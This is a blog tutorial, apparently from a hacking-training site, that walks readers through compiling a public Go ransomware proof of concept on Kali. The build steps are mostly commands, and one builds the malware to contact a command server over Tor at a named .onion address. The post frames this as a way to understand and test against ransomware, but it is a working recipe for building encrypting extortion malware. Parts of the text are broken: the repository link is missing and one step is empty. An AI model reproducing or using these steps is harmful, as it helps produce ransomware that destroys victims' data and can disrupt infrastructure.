top of page
  • Writer's pictureotw

Ransomware: Build Your Own Ransomware, Part 1

Welcome back, my aspiring cyberwarriors!

Ransomware is rapidly becoming the most important form of malware afflicting our digital systems. Companies across the globe are being hit with various forms of malware including the new variant, Snake, designed specifically for SCADA/ICS systems. The Colonial Pipeline in the US was shutdown for nearly a week before paying a $5 million ransom, demonstrating the danger of this ransomware to industrial systems and a nation's infrastructure. Recently, the major US insurance company, CNA, admitted to having paid a ransom of $40 million! No wonder ransomware developers are getting more and more creative and malicious, ransomware pays!

To better understand how ransomware works, let's build our own ransomware from a Proof of Concept (POC) available from mauri870 on He developed this ransomware as part of his academic program and it is not designed for malicious purposes but rather to help us understand how ransomware works. Like the new variant, Snake, and a growing number of malware strains, this malware is written in Golang.

This malware encrypts the files in the background with AES-256-CTR and uses RSA-4096 to secure the data exchange with the server. This ransomware is very similar to Cryptolocker, one of the most successful ransomware attacks in history.

Step #1: Download and Install the Binaries

The first step is to fire up your Kali and make certain that golang is installed. If not, download it from the Kali repositories by entering;

kali > sudo apt install golang

Next, you will need to login to the root user.

kali > sudo su -

Now create a directory for the binaries. In this case, I named it simply "git".

kali >mkdir git

Next, change directory (cd) to this directory.

kali > cd git

Next, download the binaries from

kali > git clone

Step #2: Export GO Environment variables

Next, we need to set some environment variables to direct the binaries and GO to the appropriate directories.

Step #3: Make the source code dependencies

Now, with the variables set and exported, we need to make the dependencies. Navigate to the new directory, ransomware, and enter make deps.

kali > cd ransomware

kali > make deps

Step #4: Make the Source Code with options

Now that we have completed the deps make, we can begin to make the source code. In our case, we will use a few options.

First, we want to use ToR to encrypt our communications over the ToR network.


Second, we want to use our dark web server at hackersarisegtdj.onion (you can use any domain or localhost).


Third, we want to use port 80 (you can use any port).


Finally, we want to set the operating system to compile the source code for our operating system, in this case, Linux.


Our command should look something like this;

kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux

Now hit ENTER and watch your ransomware compile.

Step #5: Check the Directory for ransomware.exe

Once the source code has been generated, do a long listing on the ransomware directory.

kali > ls -l

Now, navigate to the bin directory.

kali > cd bin

Here, you will see the ransomware.exe, the server and unlocker.exe.

Step #6: Examine the Types of Files to be Encrypted

If you want to see what types of files this ransomware will encrypt, navigate to cmd directory and open common.go

kali > cd cmd

kali > more common.go

Here, you can see the file extensions that this ransomware will target to encrypt when executed.


Ransomware is probably the greatest threat to our digital systems at this moment. As the Colonial Pipeline attack clearly demonstrated, nearly everyone is vulnerable and if SCADA/ICS systems are compromised there can be significant economic and infrastructure ramifications!

This POC of ransomware will help you to better understand ransomware as a threat and test to see whether your systems are vulnerable to such an attack.

In the second part of this series, we will test this ransomware on a Windows VM.

If you want or your team to learn more about ransomware, our Ransomware training videos are available in our online store.

bottom of page